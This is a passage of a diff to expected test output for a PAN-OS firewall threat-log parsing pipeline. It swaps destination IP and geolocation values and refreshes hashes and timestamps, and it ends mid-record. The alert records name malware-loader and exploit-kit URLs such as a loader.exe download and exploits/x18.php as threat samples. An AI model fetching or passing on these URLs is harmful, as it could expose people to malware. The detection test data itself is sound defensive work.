b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json @@ -7,26 +7,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -42,7 +41,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -84,7 +83,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=", + "community_id": "1:CpnxxiYk2GolQXL1AiyOIq2jeIE=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -121,14 +120,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545296385Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.078988500Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -151,26 +150,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -186,7 +184,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -228,7 +226,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0fIOSC1t62T9ExNKvZaxl657EVc=", + "community_id": "1:lB9VWdNEHqna/swiak+4X1dqv1k=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -265,14 +263,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545314754Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.078997900Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=2\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -295,26 +293,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -330,7 +327,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -372,7 +369,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bZl1JgwyPgfsbSrD+z8I/hpbdc4=", + "community_id": "1:3be4rO6jMOmXDKYhNViDYESR4pg=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -409,14 +406,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545322646Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079001800Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=5\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -439,26 +436,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -474,7 +470,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -516,7 +512,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ghLw4NDj0JmAhH9lVtlhdQpqEQ0=", + "community_id": "1:CvgumdBliLFimUvrE/1C91M3lrQ=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -553,14 +549,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545329990Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079006500Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/count.php?o=7\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -583,26 +579,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -618,7 +613,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -660,7 +655,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:aiB5YppFUGX0pM/1Xtp3qOSFXJw=", + "community_id": "1:6fDJsdstw4iPHg4mtYfqCIw/9W8=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -697,14 +692,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545337309Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079012400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -727,26 +722,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -762,7 +756,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -804,7 +798,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:GOqfpUTezPkpm6axBI22kY90kU4=", + "community_id": "1:36riPo5QLmTmjShd1xO6omV9lbg=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -841,14 +835,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545344582Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079018400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -871,26 +865,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -906,7 +899,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -948,7 +941,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:22ouAyA1O0KgUQOEKP20E7gNa2U=", + "community_id": "1:GY8jhTkAcplSQMn+CC7/azIV2gs=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -985,14 +978,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545351833Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079024200Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1015,26 +1008,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1050,7 +1042,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1092,7 +1084,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:phQpgsVhj3YxNYzeNkqdzDgcMCg=", + "community_id": "1:5JhT/ZcbuwDQS34hGqhKf01RQ34=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -1129,14 +1121,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545359103Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079030200Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1159,26 +1151,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1194,7 +1185,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1236,7 +1227,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:6kV576B7jMsBLC62npA6Dgi/zMI=", + "community_id": "1:JLt9t3wJPT2YYVwyev/DS8HhBiQ=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -1273,14 +1264,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545368815Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079036100Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1303,26 +1294,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1338,7 +1328,7 @@ }, "ip": "192.168.0.2" }, - "message": 